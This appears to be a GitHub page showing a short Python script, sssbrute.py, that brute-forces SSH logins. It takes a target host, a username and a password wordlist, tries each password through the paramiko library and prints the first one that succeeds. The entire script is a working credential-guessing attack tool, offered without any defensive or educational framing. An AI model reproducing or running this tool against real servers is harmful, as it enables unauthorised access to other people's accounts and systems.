-
Notifications
You must be signed in to change notification settings - Fork 0
/
sssbrute.py
42 lines (34 loc) · 1.18 KB
/
sssbrute.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
import paramiko, sys, os, socket, termcolor
def ssh_connect(password, code=0):
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
ssh.connect(host, port=22, username=username, password=password)
except paramiko.AuthenticationException:
code = 1
except socket.error as e:
code = 2
ssh.close()
return code
host = input('[+] Target Address: ')
username = input('[+] SSH Username: ')
input_file = input('[+] Passwords File: ')
if os.path.exists(input_file) ==False:
print('[!!] That File/Path Doesnt Exist')
sys.exit(1)
with open(input_file, 'r') as file:
for line in file.readlines():
password = line.strip()
try:
response = ssh_connect(password)
if response == 0:
print(termcolor.colored(('[+] Found Password: '+ password + ' , For Account: '+ username), 'green'))
break
elif response == 1:
print('[-] Incorrect Login: '+ password)
elif response == 2:
print('[!!] Cant connect')
sys.exit(1)
except Exception as e:
print(e)
pass